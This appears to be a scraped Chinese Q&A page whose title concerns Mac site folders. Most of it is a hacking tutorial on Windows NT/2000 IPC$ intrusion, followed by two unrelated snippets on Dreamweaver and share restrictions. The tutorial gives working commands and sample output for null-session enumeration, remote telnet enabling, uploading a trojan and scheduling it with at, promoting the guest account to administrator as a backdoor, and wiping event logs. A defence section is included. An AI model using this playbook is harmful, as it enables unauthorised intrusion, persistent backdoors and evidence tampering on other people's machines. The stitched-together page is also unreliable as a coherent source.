Mac站點文件夾什麼意思

Ⅰ ipc$什麼意思

ipc$詳細解釋大全
一 前言

網上關於ipc$入侵的文章可謂多如牛毛，而且也不乏優秀之作，攻擊步驟甚至可以說已經成為經典的模式，因此也沒人願意再把這已經成為定式的東西拿出來擺弄。
不過話雖這樣說，但我個人認為這些文章講解的並不詳細，對於第一次接觸ipc$的菜鳥來說，簡單的羅列步驟並不能解答他們的種種迷惑（你隨便找一個hack論壇搜一下ipc$，看看存在的疑惑有多少）。因此我參考了網上的一些資料，教程以及論壇帖子，寫了這篇總結性質的文章，想把一些容易混淆，容易迷惑人的問題說清楚，讓大家不要總徘徊在原地!
注意：本文所討論的各種情況均默認發生在win NT/2000環境下，win98將不在此次討論之列，而鑒於win Xp在安全設置上有所提高，個別操作並不適用，有機會將單獨討論。

二 什麼是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的資源，它是為了讓進程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道並以此通道進行加密數據的交換，從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能，它有一個特點，即在同一時間內，兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時，在初次安裝系統時還打開了默認共享，即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導致了系統安全性的降低。
平時我們總能聽到有人在說ipc$漏洞，ipc$漏洞，其實ipc$並不是一個真正意義上的漏洞,我想之所以有人這么說，一定是指微軟自己安置的那個『後門』：空會話（Null session）。那麼什麼是空會話呢？

三 什麼是空會話

在介紹空會話之前，我們有必要了解一下一個安全會話是如何建立的。
在Windows NT 4.0中是使用挑戰響應協議與遠程機器建立一個會話的，建立成功的會話將成為一個安全隧道，建立雙方通過它互通信息，這個過程的大致順序如下：
1）會話請求者（客戶）向會話接收者（伺服器）傳送一個數據包，請求安全隧道的建立；
2）伺服器產生一個隨機的64位數（實現挑戰）傳送回客戶；
3）客戶取得這個由伺服器產生的64位數，用試圖建立會話的帳號的口令打亂它，將結果返回到伺服器（實現響應）；
4）伺服器接受響應後發送給本地安全驗證（LSA），LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是伺服器的本地帳號，核實本地發生；如果請求的帳號是一個域的帳號，響應傳送到域控制器去核實。當對挑戰的響應核實為正確後，一個訪問令牌產生，然後傳送給客戶。客戶使用這個訪問令牌連接到伺服器上的資源直到建議的會話被終止。
以上是一個安全會話建立的大致過程，那麼空會話又如何呢？

空會話是在沒有信任的情況下與伺服器建立的會話（即未提供用戶名與密碼），但根據WIN2000的訪問控制模型，空會話的建立同樣需要提供一個令牌，可是空會話在建立過程中並沒有經過用戶信息的認證，所以這個令牌中不包含用戶信息，因此，這個會話不能讓系統間發送加密信息，但這並不表示空會話的令牌中不包含安全標識符SID（它標識了用戶和所屬組），對於一個空會話，LSA提供的令牌的SID是S-1-5-7，這就是空會話的SID，用戶名是：ANONYMOUS LOGON（這個用戶名是可以在用戶列表中看到的，但是是不能在SAM資料庫中找到，屬於系統內置的帳號），這個訪問令牌包含下面偽裝的組：
Everyone
Network
在安全策略的限制下，這個空會話將被授權訪問到上面兩個組有權訪問到的一切信息。那麼建立空會話到底可以作什麼呢？

四 空會話可以做什麼

對於NT，在默認安全設置下，藉助空連接可以列舉目標主機上的用戶和共享，訪問everyone許可權的共享，訪問小部分注冊表等，並沒有什麼太大的利用價值；對2000作用更小，因為在Windows 2000 和以後版本中默認只有管理員和備份操作員有權從網路訪問到注冊表，而且實現起來也不方便，需藉助工具。從這些我們可以看到，這種非信任會話並沒有多大的用處，但從一次完整的ipc$入侵來看，空會話是一個不可缺少的跳板，因為我們從它那裡可以得到戶列表，這對於一個老練的黑客已經足夠了。以下是空會話中能夠使用的具體命令：

1 首先，我們先建立一個空會話（需要目標開放ipc$）
命令：net use \\ip\ipc$ "" /user:""
注意：上面的命令包括四個空格，net與use中間有一個空格，use後面一個，密碼左右各一個空格。

2 查看遠程主機的共享資源
命令：net view \\IP
解釋：建立了空連接後，用此命令可以查看遠程主機的共享資源，如果它開了共享，可以得到如下類似類似結果：
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。

3 查看遠程主機的當前時間
命令：net time \\IP
解釋：用此命令可以得到一個遠程主機的當前時間。

4 得到遠程主機的NetBIOS用戶名列表（需要打開自己的NBT）
nbtstat -A IP
用此命令可以得到一個遠程主機的NetBIOS用戶名列表（需要你的netbios支持），返回如下結果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我們經常使用空會話做的事情，好像也能獲得不少東西喲，不過要注意一點：建立IPC$連接的操作會在EventLog中留下記錄，不管你是否登錄成功。 好了，那麼下面我們就來看看ipc$所使用的埠是什麼？

五 ipc$所使用的埠

首先我們來了解一些基礎知識：
1 SMBServer Message Block) Windows協議族，用於文件列印共享的服務；
2 NBTNETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）埠實現基於TCP/IP協議的NETBIOS網路互聯。
3 在WindowsNT中SMB基於NBT實現，而在Windows2000中，SMB除了基於NBT實現，還可以直接通過445埠實現。

有了這些基礎知識，我們就可以進一步來討論訪問網路共享對埠的選擇了：

對於win2000客戶端來說：
1 如果在允許NBT的情況下連接伺服器時，客戶端會同時嘗試訪問139和445埠，如果445埠有響應，那麼就發送RST包給139埠斷開連接，用455埠進行會話，當445埠無響應時，才使用139埠，如果兩個埠都沒有響應，則會話失敗；
2 如果在禁止NBT的情況下連接伺服器時，那麼客戶端只會嘗試訪問445埠，如果445埠無響應，那麼會話失敗。由此可見，禁止了NBT後的win 2000對win NT的共享訪問將會失敗。

對於win2000伺服器端來說：
1 如果允許NBT, 那麼UDP埠137, 138, TCP 埠 139, 445將開放；
2 如果禁止NBT，那麼只有445埠開放。

我們建立的ipc$會話對埠的選擇同樣遵守以上原則。顯而易見，如果遠程伺服器沒有監聽139或445埠，ipc$會話是無法建立的。

六 ipc$連接在hack攻擊中的意義

就像上面所說的，即使你建立了一個空的連接，你也可以獲得不少的信息（而這些信息往往是入侵中必不可少的），如果你能夠以某一個具有一定許可權的用戶身份登陸的話，那麼你就會得到相應的許可權，顯然，如果你以管理員身份登陸,嘿嘿,那你可就了不得了，基本上可以為所欲為了。不過你也不要高興的太早，因為管理員的密碼不是那麼好搞到的，雖然會有一些粗心的管理員存在弱口令，但這畢竟是少數，而且現在不比從前了，隨著人們安全意識的提高，管理員們也愈加小心了，得到管理員密碼將會越來越難的，因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接，甚至在主機不開啟ipc$共享時，你根本就無法連接，你會慢慢的發現ipc$連接並不是萬能的，所以不要奢望每次連接都能成功，那是不現實的。
是不是有些灰心？倒也不用,關鍵是我們要擺正心態，不要把ipc$入侵當作終極武器，不要認為它戰無不勝,它只是很多入侵方法中的一種，你有可能利用它一擊必殺，也有可能一無所獲，這些都是正常的，在黑客的世界裡，不是每條大路都能通往羅馬，但總有一條路會通往羅馬，耐心的尋找吧！

七 ipc$連接失敗的常見原因

以下是一些常見的導致ipc$連接失敗的原因：

1 IPC連接是Windows NT及以上系統中特有的功能，由於其需要用到Windows NT中很多DLL函數，所以不能在Windows 9.x/Me系統中運行，也就是說只有nt/2000/xp才可以相互建立ipc$連接，98/me是不能建立ipc$連接的；

2 如果想成功的建立一個ipc$連接，就需要對方開啟ipc$共享，即使是空連接也是這樣，如果對方關閉了ipc$共享，你將會建立失敗；

3 你未啟動Lanmanworkstation服務，它提供網路鏈結和通訊，沒有它你無法發起連接請求（顯示名為：Workstation）；

4 對方未啟動Lanmanserver服務，它提供了 RPC 支持、文件、列印以及命名管道共享，ipc$依賴於此服務，沒有它遠程主機將無法響應你的連接請求（顯示名為：Server）；

5 對方未啟動NetLogon，它支持網路上計算機 pass-through 帳戶登錄身份；

6 對方禁止了NBT（即未打開139埠）；

7 對方防火牆屏蔽了139和445埠；

8 你的用戶名或者密碼錯誤（顯然空會話排除這種錯誤）；

9 命令輸入錯誤：可能多了或少了空格，當用戶名和密碼中不包含空格時兩邊的雙引號可以省略，如果密碼為空，可以直接輸入兩個引號""即可；

10 如果在已經建立好連接的情況下對方重啟計算機，那麼ipc$連接將會自動斷開，需要重新建立連接。

另外,你也可以根據返回的錯誤號分析原因：
錯誤號5，拒絕訪問：很可能你使用的用戶不是管理員許可權的，先提升許可權；
錯誤號51，Windows無法找到網路路徑：網路有問題；
錯誤號53，找不到網路路徑：ip地址錯誤；目標未開機；目標lanmanserver服務未啟動；目標有防火牆（埠過濾）；
錯誤號67，找不到網路名：你的lanmanworkstation服務未啟動或者目標刪除了ipc$；
錯誤號1219，提供的憑據與已存在的憑據集沖突：你已經和對方建立了一個ipc$，請刪除再連；
錯誤號1326，未知的用戶名或錯誤密碼：原因很明顯了；
錯誤號1792，試圖登錄，但是網路登錄服務沒有啟動：目標NetLogon服務未啟動；
錯誤號2242，此用戶的密碼已經過期：目標有帳號策略，強制定期要求更改密碼。

八 復制文件失敗的原因

有些朋友雖然成功的建立了ipc$連接，但在時卻遇到了這樣那樣的麻煩，無法復製成功，那麼導致復制失敗的常見原因又有哪些呢？

1 盲目復制
這類錯誤出現的最多，佔到50%以上。許多朋友甚至都不知道對方是否有共享文件夾，就進行盲目復制，結果導致復制失敗而且郁悶的很。因此我建議大家在進行復制之前務必用net view \\IP這個命令看一下對方的共享情況，不要認為ipc$連接建立成功了就一定有共享文件夾。

2 默認共享判斷錯誤
這類錯誤也是大家經常犯的，主要有兩個小方面：

1）錯誤的認為能建立ipc$連接的主機就一定開啟了默認共享，因而在建立完連接之後馬上向admin$之類的默認共享復制文件，導致復制失敗。ipc$連接成功只能說明對方打開了ipc$共享，ipc$共享與默認共享是兩碼事，ipc$共享是一個命名管道，並不是哪個實際的文件夾，而默認共享並不是ipc$共享的必要條件；

2）由於net view \\IP 無法顯示默認共享（因為默認共享帶$），因此通過這個命令，我們並不能判斷對方是否開啟了默認共享，因此如果對方未開啟默認共享，那麼所有向默認共享進行的操作都不能成功；（不過大部分掃描軟體在掃弱口令的同時，都能掃到默認共享目錄，可以避免此類錯誤的發生）

3用戶許可權不夠，包括四種情形：
1）空連接向所有共享（默認共享和普通共享）復制時，大多情況下許可權是不夠的；
2）向默認共享復制時，要具有管理員許可權；
3）向普通共享復制時，要具有相應許可權（即對方事先設定的訪問許可權）；
4）對方可以通過防火牆或安全軟體的設置，禁止外部訪問共享；

還需要說明一點：不要認為administrator就一定是管理員，管理員名稱是可以改的。

4被防火牆殺死或在區域網
也許你的復制操作已經成功，但當遠程運行時，被防火牆殺掉了，導致找不到文件；還有可能你把木馬復制到了區域網內的主機，導致連接失敗。因此建議你復制時要小心，否則就前功盡棄了。

呵呵，大家也知道，ipc$連接在實際操作過程中會出現千奇百怪的問題，上面我所總結的只是一些常見錯誤，沒說到的，只能讓大家自己去體會了。

九 如何打開目標的IPC$共享以及其他共享

目標的ipc$不是輕易就能打開的，否則就要天下打亂了。你需要一個admin許可權的shell,比如telnet,木馬等，然後在shell下執行net share ipc$來開放目標的ipc$，用net share ipc$ /del來關閉共享。如果你要給它開共享文件夾，你可以用net share baby=c:\，這樣就把它的c盤開為共享名為baby共享了。

十 一些需要shell才能完成的命令

看到很多教程這方面寫的十分不準確，一些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了，起了誤導作用。那麼下面我總結一下需要在shell才能完成的命令：

1 向遠程主機建立用戶，激活用戶，修改用戶密碼，加入管理組的操作需要在shell下完成；

2 打開遠程主機的ipc$共享，默認共享，普通共享的操作需要在shell下完成；

3 運行/關閉遠程主機的服務，需要在shell下完成；

4 啟動/殺掉遠程主機的進程，也需要在shell下完成。

十一 入侵中可能會用到的相關命令

請注意命令適用於本地還是遠程，如果適用於本地，你只能在獲得遠程主機的shell後，才能向遠程主機執行。

1 建立空連接:
net use \\IP\ipc$ "" /user:""

2 建立非空連接:
net use \\IP\ipc$ "psw" /user:"account"

3 查看遠程主機的共享資源（但看不到默認共享）
net view \\IP

4 查看本地主機的共享資源（可以看到本地的默認共享）
net share

5 得到遠程主機的用戶名列表
nbtstat -A IP

6 得到本地主機的用戶列表
net user

7 查看遠程主機的當前時間
net time \\IP

8 顯示本地主機當前服務
net start

9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y

10 映射遠程共享:
net use z: \\IP\baby
此命令將共享名為baby的共享資源映射到z盤

11 刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del /y刪除全部

12 向遠程主機復制文件
\路徑\srv.exe \\IP\共享目錄名，如：
ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內

13 遠程添加計劃任務
at \\ip 時間 程序名，如：
at \\127.0.0.0 11:00 love.exe
注意：時間盡量使用24小時制；在系統默認搜索路徑（比如system32/）下不用加路徑，否則必須加全路徑

14 開啟遠程主機的telnet
這里要用到一個小程序：opentelnet.exe，各大下載站點都有，而且還需要滿足四個要求：

1）目標開啟了ipc$共享
2）你要擁有管理員密碼和帳號
3）目標開啟RemoteRegistry服務，用戶就該ntlm認證
4）對WIN2K/XP有效，NT未經測試
命令格式：OpenTelnet.exe \\server account psw NTLM認證方式 port
試例如下：c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 關閉遠程主機的telnet
同樣需要一個小程序：ResumeTelnet.exe
命令格式：ResumeTelnet.exe \\server account psw
試例如下：c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 刪除一個已建立的ipc$連接
net use \\IP\ipc$ /del

（本教程不定期更新，欲獲得最新版本，請登陸官方網站：菜菜鳥社區原創http://ccbirds.yeah.net）

十二 ipc$完整入侵步驟祥解

其實入侵步驟隨個人愛好有所不同，我就說一下常見的吧，呵呵，獻丑了！

1 用掃描軟體搜尋存在若口令的主機，比如流光，SSS，X-scan等，隨你的便，然後鎖定目標，如果掃到了管理員許可權的口令，你可以進行下面的步驟了，假設你現在得到了administrator的密碼為空

2 此時您有兩條路可以選擇：要麼給對方開telnet（命令行）,要麼給它傳木馬（圖形界面），那我們就先走telnet這條路吧

3上面開telnet的命令沒忘吧，要用到opentelnet這個小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: [email protected]
OpenTelnet.exe

UsagepenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!

NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...
telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*說明你已經打開了一個埠90的telnet。

4 現在我們telnet上去
telnet 192.168.21.* 90
如果成功，你將獲得遠程主機的一個shell,此時你可以像控制自己的機器一樣控制你的肉雞了，那麼做點什麼呢？把guest激活再加入管理組吧，就算留個後門了

5 C:\>net user guest /active:yes
*將Guest用戶激活，也有可能人家的guest本來就試活的，你可以用net user guest看一下它的帳戶啟用的值是yes還是no

6 C:\>net user guest 1234
*將Guest的密碼改為1234,或者改成你喜歡的密碼

7 C:\>net localgroup administrators guest /add
*將Guest變為Administrator，這樣，即使以後管理員更改了他的密碼，我們也可以用guest登錄了，不過也要提醒您，因為通過安全策略的設置，可以禁止guest等帳戶的遠程訪問，呵呵，如果真是這樣，那我們的後門也就白做了，願上帝保佑Guest。

8 好了，現在我們來走另一條路，給它傳個木馬玩玩

9 首先，我們先建立起ipc$連接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator

10 既然要上傳東西，就要先知道它開了什麼共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享資源
資源共享名 類型 用途 注釋

-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了，我們看到對方共享了C,D兩個盤，我們下面就可以向任意一個盤復制文件了。再次聲明，因為用net view命令無法看到默認共享，因此通過上面返回的結果，我們並不能判斷對方是否開啟了默認共享。

11 C:\> love.exe \\192.168.21.*\c
已復制 1 個文件
*用這個命令你可以將木馬客戶端love.exe傳到對方的c盤下，當然，如果能復制到系統文件夾下是最好的了，不容易被發現

12 運行木馬前，我們先看看它現在的時間
net time \\192.168.21.*
\\192.168.21.*的當前時間是 2003/8/22 上午 11:00
命令成功完成

13 現在我們用at運行它吧，不過對方一定要開了Task Scheler服務（允許程序在指定時間運行），否則就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一項作業，其作業 ID = 1

14 剩下就是等了，等過了11:02，你就可以用控制端去連接了，如果成功你將可以用圖形界面去控制遠程主機了，如果連接失敗，那麼它可能在區域網里，也可能程序被防火牆殺了，還可能它下線了（沒這么巧吧），無論哪種情況你只好放棄了

嗯，好了，兩種基本方法都講了。如果你對上面的操作已經輕車熟路了，也可以用更高效的套路，比如用CA克隆guest，用p***ec執行木馬，用命令：p***ec \\tergetIP -u user -p paswd cmd.exe直接獲得shell等，這些都是可以得，隨你的便。不過最後不要忘了把日誌清理干凈，可以用榕哥的elsave.exe。
講了ipc$的入侵，就不能不說如何防範，那麼具體要怎樣做呢？看下面

十三 如何防範ipc$入侵

1 禁止空連接進行枚舉(此操作並不能阻止空連接的建立)

方法1：
運行regedit，找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為：1
如果設置為"1"，一個匿名用戶仍然可以連接到IPC$共享，但限制通過這種連接得到列舉SAM帳號和共享等信息；在Windows 2000 中增加了"2"，限制所有匿名訪問除非特別授權，如果設置為2的話,可能會有一些其他問題發生，建議設置為1。如果上面所說的主鍵不存在，就新建一個再改鍵值。

方法2：
在本地安全設置－本地策略－安全選項－在'對匿名連接的額外限制'中做相應設置

2 禁止默認共享

1）察看本地共享資源
運行-cmd-輸入net share

2）刪除共享（重起後默認共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以繼續刪除）

3）停止server服務
net stop server /y （重新啟動後server服務會重新開啟）

4）禁止自動打開默認共享（此操作並未關閉ipc$共享）
運行-regedit

server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。

pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。
如果上面所說的主鍵不存在，就新建(右擊-新建-雙位元組值）一個主健再改鍵值。這兩個鍵值在默認情況下在主機上是不存在的，需要自己手動添加。

3 關閉ipc$和默認共享依賴的服務erver服務
控制面板-管理工具-服務-找到server服務（右擊）-屬性-常規-啟動類型-選已禁用 這時可能會有提示說：XXX服務也會關閉是否繼續，因為還有些次要的服務要依賴於lanmanserver，不要管它。

4 屏蔽139，445埠
由於沒有以上兩個埠的支持，是無法建立ipc$的，因此屏蔽139，445埠同樣可以阻止ipc$入侵。

1）139埠可以通過禁止NBT來屏蔽
本地連接－TCP/IT屬性－高級－WINS－選『禁用TCP/IT上的NETBIOS』一項

2）445埠可以通過修改注冊表來屏蔽
添加一個鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完後重啟機器

注意：如果屏蔽掉了以上兩個埠，你將無法用ipc$入侵別人。

3）安裝防火牆進行埠過濾

5 設置復雜密碼，防止通過ipc$窮舉出密碼。

十四 ipc$入侵問答精選

上面說了一大堆的理論東西，但在實際中你會遇到各種各樣的問題，因此為了給予大家最大的幫助，我看好幾個安全論壇，找了n多的帖子，從中整理了一些有代表性的問答，其中的一些答案是我給出的，一些是論壇上的回復，如果有什麼疏漏和錯誤，還請包涵。

1.進行ipc$入侵的時候，會在伺服器中留下記錄，有什麼辦法可以不讓伺服器發現嗎？

答：留下記錄是一定的，你走後用程序刪除就可以了，或者用肉雞入侵。

2.你看下面的情況是為什麼，可以連接但不能復制
net use \\***.***.***.***\ipc$ "密碼" /user:"用戶名"
命令成功
icmd.exe \\***.***.***.***\admin$
找不到網路路徑
命令不成功

答：可能有兩個原因：
1）你的許可權不夠，不能訪問默認共享；

2）對方沒有開啟admin$默認共享，不要認為能進行ipc$連接，對方就一定開了默認共享（很多人都這么以為，誤區！！），此時你可以試試別的默認共享或普通共享，比如c$,d$,c,d等，如果還是不行，就要看你的許可權了，如果是管理員許可權，你可以開telnet,如果能成功，在給它開共享也行。

3.如果對方開了IPC$，且能建立空聯接，但打開C、D盤時，都要求密碼，我知道是空連接沒有太多的許可權，

Ⅱ mac dreamweaver 伺服器搭建後連接不到本地伺服器

一、本地測試伺服器最常見的問題原因是沒有為「伺服器文件夾」和「Web
URL」輸入正確的值。它們必須指向相同的位置：
（1）「伺服器文件夾」是指向伺服器文手輪檔根中的站點根的物理路徑。
（2）「Web URL」是您在瀏覽器地址欄中為到達同一位置而輸入的值。
（3）本地 Web 伺服器是否正在運行？
（4）是否有軟體防火牆妨礙了 Dreamweaver 與 Web 伺服器之間的通信？嘗試暫時禁用防火牆是否有區別。
（5）選擇「視圖」>「實時視圖選項」。確保選中「為文檔來源使用測試伺服器」選項。
二、排除問題後重新進行安裝如下

1.打開dreamweaver CS6軟體。

2.點擊菜單中的「站點」，選擇「管理站信則點」。
3.打開管理站點中的「滑薯棚新建站點按鈕」。
4.選中左邊的伺服器，然後單擊右邊下方的+按鈕。
5.然後輸入伺服器名稱、連接方法選擇為「本地/網路」、選擇網站所在文件夾、WebURL輸入http://127.0.0.1/，然後點擊保存。
6.在剛剛新建的伺服器中勾選「測試」然後單擊保存。
7.然後點擊完成，此時就創建好了。

Ⅲ windows server2019通過MAC地址限制訪問共享文件夾

如果你是iis搭建的，iis裡面可以限制ip ，你搜這個標題就行了：
【Windows Server 2019】FTP伺服器配置與管理——配置FTP站點（上）IP地址限制、身份驗證、授權規則和請求篩選